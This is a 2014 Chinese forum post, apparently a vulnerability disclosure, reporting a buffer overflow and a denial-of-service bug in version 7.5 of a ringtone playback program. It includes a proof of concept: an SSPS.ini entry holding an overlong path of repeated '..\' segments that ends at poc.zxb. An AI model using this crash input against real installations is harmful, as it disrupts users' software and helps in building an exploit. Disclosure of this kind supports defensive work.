-
-
[原创]深蓝音乐铃声播放系统 7.5 内存破坏漏洞两枚(缓冲区溢出漏洞+拒绝服务漏洞)
-
发表于:
2014-6-8 12:26
3572
-
[原创]深蓝音乐铃声播放系统 7.5 内存破坏漏洞两枚(缓冲区溢出漏洞+拒绝服务漏洞)
程序下载地址http://www.skycn.com/soft/appid/13261.html 该存在2枚内存破坏漏洞。
漏洞1:处理某地址时由于地址过长,造成缓冲区溢出漏洞。
漏洞2:处理zxb文件错误,存在拒绝服务漏洞。
漏洞内容:
该存在2枚内存破坏漏洞。
漏洞1:处理某地址时由于地址过长,造成缓冲区溢出漏洞。
漏洞2:处理zxb文件错误,存在拒绝服务漏洞。
漏洞1poc: 打开程序路径下的SSPS.ini文件。把作息表一项改成
作息表=c:\program files\ssps\作息表\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\poc.zxb
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课